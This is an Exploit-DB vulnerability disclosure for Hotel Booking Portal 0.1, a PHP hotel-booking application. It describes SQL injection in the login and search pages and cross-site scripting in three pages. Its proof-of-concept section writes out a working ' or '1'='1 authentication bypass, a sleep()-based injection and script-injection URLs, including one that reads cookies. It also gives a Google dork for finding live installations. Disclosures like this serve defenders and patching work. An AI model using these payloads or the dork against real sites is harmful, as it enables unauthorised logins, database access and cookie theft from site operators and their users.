Hotel Booking Portal 0.1 - Multiple Vulnerabilities

EDB-ID:

20476

CVE:





Platform:

PHP

Date:

2012-08-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# -----------------------------------------------------------
#			   _____ _ _            _      _ 
#			  / ____(_) |          | |    | |
#			 | |     _| |_ __ _  __| | ___| |
#			 | |    | | __/ _` |/ _` |/ _ \ |
#			 | |____| | || (_| | (_| |  __/ |
#			  \_____|_|\__\__,_|\__,_|\___|_|
#			  
# -----------------------------------------------------------
# Hotel Booking Portal v0.1 Multiple Vulnerabilities
# Google dork: "Made And Powered By Hotels Portal"
# Bug discovered by Yakir Wizman, <yakir.wizman@gmail.com>
# Date 09/08/2012
# Download - http://sourceforge.net/projects/hbportal/
# ISRAEL
# -----------------------------------------------------------
#		Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
# 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
# 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# 1). POST a form to login.php with the value of:
# email set to		: ' or '1'='1
# password set to	: ' or '1'='1
# 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
# -----------------------------------------------------------